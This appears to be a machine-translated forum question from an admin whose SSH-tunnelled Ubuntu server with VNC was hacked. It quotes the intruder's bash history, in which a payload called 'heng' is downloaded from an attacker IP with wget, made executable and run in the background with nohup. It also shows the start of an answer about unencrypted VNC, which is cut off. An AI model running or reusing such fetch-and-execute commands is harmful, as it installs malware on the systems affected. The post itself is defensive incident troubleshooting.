所以,今天我被黑客入侵。我很困惑这是如何做到的,所以我在寻找有经验的人来指出我的系统设计中的弱点。
我有两台服务器。一台是 VPS,可连接到互联网(服务器1),第二个是私有网络内的服务器(服务器2),通过 ssh 反向隧道连接到第一个,暴露端口22(ssh)和5900(x11vnc)连接到互联网。两台服务器都Ubuntu 14.04。
我使用这些命令来创建 ssh 反向隧道(在 server2 上):
autossh -fR \*:4202:localhost:22 -N [email protected]
autossh -fR \*:5900:localhost:5900 -N [email protected]
关于我的服务器上的 SSH 配置的更多细节。
服务器1
- 允许 root 登录
有这一行:
客户端指定的 GatewayPorts
服务器2
- 不允许 root 登录。
- 使用默认(库存) ssh 配置
- 我使用常见的(蝙蝠侠相关:))用户名和 9 个字符的密码。
至于x11,我使用这个命令来创建 x11vnc 服务器:
/usr/bin/x11vnc -dontdisconnect -notruecolor -noxfixes -shared -forever -rfbport 5900 -bg -o /home/{username}/.vnc/x11vnc.log -rfbauth /home/{username}/.vnc/passwd -auth /var/lib/mdm/:0.Xauth
我的 VNC 密码非常好。
服务器1 正在遭受暴力破解,但我没有任何证据证明它已被泄露。
如果没有密码,您无法从 server1 访问 server2。
被黑客入侵!
所以今天我在我的.bash_history在服务器2:
wget http://{HACKER_IP}:8080/heng
chmod 0755 /root/heng
chmod 0755 ./heng
/dev/null 2>&1 &
nohup ./heng > /dev/null 2>&1 &
{HACKER_IP} 已报告虚拟总计作为一个分发響鳴。
/var/log/auth.log很干净。
恒进程位于我的内存中,但不在磁盘上。我已关闭系统,因此不再有它。
我的配置和使用中可能存在的弱点:
- 密码曾经通过 Skype 传输。
- 我用外壳,我使用密码管理器来存储我的连接的密码。
- 我用公共无线网络经常。
我哪里做错了 ?
为什么服务器2之前受到攻击服务器1? 它位于非标准 4202 端口并使用非常好的登录/密码组合。
我以后该如何避免这种情况?
答案1
据我从您的设置中得知,VNC 通信未加密。将会话键盘记录回 server2 会很容易。请参阅: